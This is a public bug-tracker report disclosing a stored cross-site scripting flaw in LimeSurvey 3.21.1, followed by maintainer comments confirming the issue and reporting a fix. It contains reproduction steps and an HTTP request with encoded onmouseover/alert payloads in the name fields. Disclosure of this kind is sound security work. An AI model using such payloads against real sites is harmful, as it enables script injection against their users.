| ID | Project | Category | View Status | Date Submitted | Last Update |
|---|---|---|---|---|---|
| 15680 | Bug reports | LimeSurvey Website | public | 2019-12-19 14:24 | 2020-05-04 09:44 |
| Reporter | misheljava | Assigned To | |||
| Priority | none | Severity | partial_block | ||
| Status | closed | Resolution | fixed | ||
| Product Version | 3.21.1 | ||||
| Fixed in Version | 3.21.2 | ||||
| Summary | 15680: LimeSurvey 3.21.1 Cross Site Scripting Stored | ||||
| Description | • Title: LimeSurvey 3.21.1 Cross Site Scripting (XSS) Stored (2 instances) | ||||
| Steps To Reproduce | Steps to Reproduce: List of vulnerable parameters: Steps to reproduce: Step 2 - Add new survey participant. Insert following payloads into the First name & Last name fields and click save. (See second screenshot). Step 3 - Now click on Save and you should see message saying Success. (See screenshot 3). Now click on 'Browse survey participant'. Step 4 - Once you browse to survey participants, you will see new participant has been added with your payload as firstname and lastname (See screenshot 4) Step 5 - Now click on Edit symbol to edit your participant. (See screenshot 4). Once the edit window will pop you will notice your XSS payload rendering in the browser (See screenshot 5 and 6) and screenshot 7 showing that the user supplied was not sanitized and the there is no output encoding. | ||||
| Additional Information | Due to the size of the server response I will only include HTTP request and snip of response showing there is not output encoding in place HTTP request with vulnerable parameters and XSS payloads: POST /limesurvey3.21.1/index.php/admin/tokens/sa/addnew/surveyid/686776/tokenid HTTP/1.1 YII_CSRF_TOKEN=WkJDTFA4RDdmbUJvMVhVS0VNdXFaQzNCa2g5UnE1dnJRvylcV9_gUYN_cIoQdadDDRfuRrsY_3lxPsqhxgrh3A%3D%3D&completed-switch=0&completed-date=N&completed=N&firstname=Fname%22onmouseover%3D%22alert%28%27Fname%27%29%22style%3D%22position%3Aabsolute%3Bwidth%3A100%25%3Bheight%3A100%25%3Btop%3A0%3Bleft%3A0%3B%229e2ad%2F%2F&lastname=Lname%22onmouseover%3D%22alert%28%27Lname%27%29%22style%3D%22position%3Aabsolute%3Bwidth%3A100%25%3Bheight%3A100%25%3Btop%3A0%3Bleft%3A0%3B%229e2ad%2F%2F&token=&language=en&email=tter%40tes.cpom&emailstatus=+OK+&sent-switch=0&sent-date=N&sent=N&remind-switch=0&remind-date=N&remindersent=N&usesleft=1&validfrom=&validuntil=&subaction=inserttoken&sid=686776 Second HTTP request with XSS payloads in the response (See screenshot 7): GET /limesurvey3.21.1/index.php/admin/tokens/sa/edit/iSurveyId/686776/iTokenId/6/ajax/true?YII_CSRF_TOKEN=WkJDTFA4RDdmbUJvMVhVS0VNdXFaQzNCa2g5UnE1dnJRvylcV9_gUYN_cIoQdadDDRfuRrsY_3lxPsqhxgrh3A%3D%3D HTTP/1.1 | ||||
| Tags | No tags attached. | ||||
| Bug heat | 10 | ||||
| Complete LimeSurvey version number (& build) | limesurvey3.21.1+191210 | ||||
| I will donate to the project if issue is resolved | No | ||||
| Browser | Chrome & Firefox | ||||
| Database type & version | DB Server version: 10.4.6-MariaDB Database client version: libmysql - mysqlnd 5.0.12-dev - 20150407 | ||||
| Server OS (if known) | |||||
| Webserver software & version (if known) | |||||
| PHP Version | PHP version: 7.3.9 | ||||
 |
Confirm the issue Not CHTML usage (or encode ) in https://github.com/LimeSurvey/LimeSurvey/blob/d8072e535cc209f281b12f57a5572e741108b6b5/application/views/admin/token/tokenform.php#L150 |
|
|
PS : since some survey can allow register : I think this XSS is public accessible in survey with register allowed. |
 |
Fix committed to master branch: http://bugs.limesurvey.org/plugin.php?page=Source/view&id=29293 |
 |
@misheljava Thanks a lot for these very useful and well document issue reports! |
 |
Fixed in Release 4.0.0+200116 |
